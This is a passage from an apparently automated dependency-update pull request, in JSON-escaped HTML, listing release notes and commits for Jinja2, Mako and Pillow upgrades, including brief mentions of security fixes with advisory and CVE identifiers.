href=\"https://redirect.github.com/pallets/jinja/issues/1792\"\u003e#1792\u003c/a\u003e, \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-gmj6-6f8f-6699\"\u003eGHSA-gmj6-6f8f-6699\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence types. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2032\"\u003e#2032\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1952\"\u003e#1952\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment when calling block references. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1701\"\u003e#1701\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another async-aware filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1781\"\u003e#1781\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1921\"\u003e#1921\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e call. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2021\"\u003e#2021\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e objects. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2025\"\u003e#2025\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2027\"\u003e#2027\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2061\"\u003e#2061\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were searched. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1661\"\u003e#1661\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not contain the templates directory. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1705\"\u003e#1705\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1880\"\u003e#1880\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1870\"\u003e#1870\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTests decorated with \u003ccode\u003e@pass_context\u003c/code\u003e can be used with the \u003ccode\u003e|select\u003c/code\u003e filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1624\"\u003e#1624\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e for multiple assignment (\u003ccode\u003ea, b = 1, 2\u003c/code\u003e) does not fail when the target is a namespace attribute. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1413\"\u003e#1413\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e in all branches of \u003ccode\u003e{% if %}{% elif %}{% else %}\u003c/code\u003e blocks does not cause the variable to be considered initially undefined. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1253\"\u003e#1253\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.4\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.4 security release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.4/\"\u003ehttps://pypi.org/project/Jinja2/3.1.4/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\"\u003ehttps://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003exmlattr\u003c/code\u003e filter does not allow keys with \u003ccode\u003e/\u003c/code\u003e solidus, \u003ccode\u003e\u0026gt;\u003c/code\u003e greater-than sign, or \u003ccode\u003e=\u003c/code\u003e equals sign, in addition to disallowing spaces. Regardless of any validation done by Jinja, user input should never be used as keys to this filter, or must be separately validated first. GHSA-h75v-3vvj-5mfj\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.3\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 3.1.x feature branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95\"\u003eGHSA-h5c8-rqwp-cp95\u003c/a\u003e. You are affected if you are using \u003ccode\u003exmlattr\u003c/code\u003e and passing user input as attribute keys.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/blob/main/CHANGES.rst\"\u003ejinja2's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 3.1.6\u003c/h2\u003e\n\u003cp\u003eReleased 2025-03-05\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup,\nallowing the sandbox to apply its checks. :ghsa:\u003ccode\u003ecpwx-vrp4-4pq7\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 3.1.5\u003c/h2\u003e\n\u003cp\u003eReleased 2024-12-21\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as\nby passing a stored reference to a filter that calls its argument.\n:ghsa:\u003ccode\u003eq2x7-8rv6-6q7h\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid\nissues with names that contain f-string syntax.\n:issue:\u003ccode\u003e1792\u003c/code\u003e, :ghsa:\u003ccode\u003egmj6-6f8f-6699\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence\ntypes. :issue:\u003ccode\u003e2032\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e.\n:pr:\u003ccode\u003e1952\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends.\n:pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment\nwhen calling block references. :issue:\u003ccode\u003e1701\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another\nasync-aware filter. :issue:\u003ccode\u003e1781\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation.\n:issue:\u003ccode\u003e1921\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e\ncall. :issue:\u003ccode\u003e2021\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e\nobjects. :issue:\u003ccode\u003e2025\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object.\n:issue:\u003ccode\u003e2027\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. :pr:\u003ccode\u003e2061\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were\nsearched. :issue:\u003ccode\u003e1661\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not\ncontain the templates directory. :issue:\u003ccode\u003e1705\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. :pr:\u003ccode\u003e1880\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. :pr:\u003ccode\u003e1870\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/15206881c006c79667fe5154fe80c01c65410679\"\u003e\u003ccode\u003e1520688\u003c/code\u003e\u003c/a\u003e release version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/90457bbf33b8662926ae65cdde4c4c32e756e403\"\u003e\u003ccode\u003e90457bb\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/065334d1ee5b7210e1a0a93c37238c86858f2af7\"\u003e\u003ccode\u003e065334d\u003c/code\u003e\u003c/a\u003e attr filter uses env.getattr\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/033c20015c7ca899ab52eb921bb0f08e6d3dd145\"\u003e\u003ccode\u003e033c200\u003c/code\u003e\u003c/a\u003e start version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/bc68d4efa99c5f77334f0e519628558059ae8c35\"\u003e\u003ccode\u003ebc68d4e\u003c/code\u003e\u003c/a\u003e use global contributing guide (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2070\"\u003e#2070\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/247de5e0c5062a792eb378e50e13e692885ee486\"\u003e\u003ccode\u003e247de5e\u003c/code\u003e\u003c/a\u003e use global contributing guide\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/ab8218c7a1b66b62e0ad6b941bd514e3a64a358f\"\u003e\u003ccode\u003eab8218c\u003c/code\u003e\u003c/a\u003e use project advisory link instead of global\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/b4ffc8ff299dfd360064bea4cd2f862364601ad2\"\u003e\u003ccode\u003eb4ffc8f\u003c/code\u003e\u003c/a\u003e release version 3.1.5 (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2066\"\u003e#2066\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/877f6e51be8e1765b06d911cfaa9033775f051d1\"\u003e\u003ccode\u003e877f6e5\u003c/code\u003e\u003c/a\u003e release version 3.1.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/8d588592653b052f957b720e1fc93196e06f207f\"\u003e\u003ccode\u003e8d58859\u003c/code\u003e\u003c/a\u003e remove test pypi\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/jinja/compare/2.10...3.1.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `mako` from 1.0.7 to 1.2.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sqlalchemy/mako/releases\"\u003emako's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.2.2\u003c/h1\u003e\n\u003cp\u003eReleased: Mon Aug 29 2022\u003c/p\u003e\n\u003ch2\u003ebug\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[bug] [lexer]\u003c/strong\u003e Fixed issue in lexer where the regexp used to match tags would not\ncorrectly interpret quoted sections individually. While this parsing issue\nstill produced the same expected tag structure later on, the mis-handling\nof quoted sections was also subject to a regexp crash if a tag had a large\nnumber of quotes within its quoted sections.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://redirect.github.com/sqlalchemy/mako/issues/366\"\u003e#366\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.2.1\u003c/h1\u003e\n\u003cp\u003eReleased: Thu Jun 30 2022\u003c/p\u003e\n\u003ch2\u003ebug\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[bug] [tests]\u003c/strong\u003e Various fixes to the test suite in the area of exception message rendering\nto accommodate for variability in Python versions as well as Pygments.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://redirect.github.com/sqlalchemy/mako/issues/360\"\u003e#360\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003emisc\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[performance]\u003c/strong\u003e Optimized some codepaths within the lexer/Python code generation process,\nimproving performance for generation of templates prior to their being\ncached. Pull request courtesy Takuto Ikuta.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://redirect.github.com/sqlalchemy/mako/issues/361\"\u003e#361\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.2.0\u003c/h1\u003e\n\u003cp\u003eReleased: Thu Mar 10 2022\u003c/p\u003e\n\u003ch2\u003echanged\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[changed] [py3k]\u003c/strong\u003e Corrected \u0026quot;universal wheel\u0026quot; directive in \u003ccode\u003esetup.cfg\u003c/code\u003e so that building a\nwheel does not target Python 2.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://redirect.github.com/sqlalchemy/mako/issues/351\"\u003e#351\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[changed] [py3k]\u003c/strong\u003e The \u003ccode\u003ebytestring_passthrough\u003c/code\u003e template argument is removed, as this\nflag only applied to Python 2.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/sqlalchemy/mako/commits\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pillow` from 5.1.0 to 10.3.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-pillow/Pillow/releases\"\u003epillow's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e10.3.0\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://pillow.readthedocs.io/en/stable/releasenotes/10.3.0.html\"\u003ehttps://pillow.readthedocs.io/en/stable/releasenotes/10.3.0.html\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eDeprecations\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecate eval(), replacing it with lambda_eval() and unsafe_eval() \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7927\"\u003e#7927\u003c/a\u003e [\u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eDeprecate ImageCms constants and versions() function \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7702\"\u003e#7702\u003c/a\u003e [\u003ca href=\"https://github.com/nulano\"\u003e\u003ccode\u003e@​nulano\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanges\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-28219: Use strncpy to avoid buffer overflow \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7928\"\u003e#7928\u003c/a\u003e [\u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse \u003ccode\u003efunctools.lru_cache\u003c/code\u003e for \u003ccode\u003ehopper()\u003c/code\u003e \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7912\"\u003e#7912\u003c/a\u003e [\u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eRaise ValueError if seeking to greater than offset-sized integer in TIFF \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7883\"\u003e#7883\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eImprove speed of loading QOI images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7925\"\u003e#7925\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAdded RGB to I;16N conversion \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7920\"\u003e#7920\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAdd --report argument to \u003cstrong\u003emain\u003c/strong\u003e.py to omit supported formats \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7818\"\u003e#7818\u003c/a\u003e [\u003ca href=\"https://github.com/nulano\"\u003e\u003ccode\u003e@​nulano\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAdded RGB to I;16, I;16L and I;16B conversion \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7918\"\u003e#7918\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFix editable installation with custom build backend and configuration options \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7658\"\u003e#7658\u003c/a\u003e [\u003ca href=\"https://github.com/nulano\"\u003e\u003ccode\u003e@​nulano\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFix putdata() for I;16N on big-endian \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7209\"\u003e#7209\u003c/a\u003e [\u003ca href=\"https://github.com/Yay295\"\u003e\u003ccode\u003e@​Yay295\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eDetermine MPO size from markers, not EXIF data \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7884\"\u003e#7884\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eImproved conversion from RGB to RGBa, LA and La \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7888\"\u003e#7888\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eSupport FITS images with GZIP_1 compression \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7894\"\u003e#7894\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse I;16 mode for 9-bit JPEG 2000 images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7900\"\u003e#7900\u003c/a\u003e [\u003ca href=\"https://github.com/scaramallion\"\u003e\u003ccode\u003e@​scaramallion\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eRaise ValueError if kmeans is negative \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7891\"\u003e#7891\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eRemove TIFF tag OSUBFILETYPE when saving using libtiff \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7893\"\u003e#7893\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eRaise ValueError for negative values when loading P1-P3 PPM images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7882\"\u003e#7882\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAdded reading of JPEG2000 palettes \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7870\"\u003e#7870\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAdded alpha_quality argument when saving WebP images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7872\"\u003e#7872\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFixed joined corners for ImageDraw rounded_rectangle() non-integer dimensions \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7881\"\u003e#7881\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eRemoved Python and NumPy pinning on Cygwin \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7880\"\u003e#7880\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUpdate UnidentifiedImageError and \u003cstrong\u003eversion\u003c/strong\u003e imports \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7644\"\u003e#7644\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eStop reading EPS image at EOF marker \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7753\"\u003e#7753\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003ePSD layer co-ordinates may be negative \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7706\"\u003e#7706\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse subprocess with CREATE_NO_WINDOW flag in ImageShow WindowsViewer \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7791\"\u003e#7791\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eWhen saving GIF frame that restores to background color, do not fill identical pixels \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7788\"\u003e#7788\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFixed reading PNG iCCP compression method \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7823\"\u003e#7823\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAllow writing IFDRational to UNDEFINED tag \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7840\"\u003e#7840\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFix logged tag name when loading Exif data \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7842\"\u003e#7842\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse maximum frame size in IHDR chunk when saving APNG images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7821\"\u003e#7821\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003ePrevent opening P TGA images without a palette \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7797\"\u003e#7797\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse palette when loading ICO images 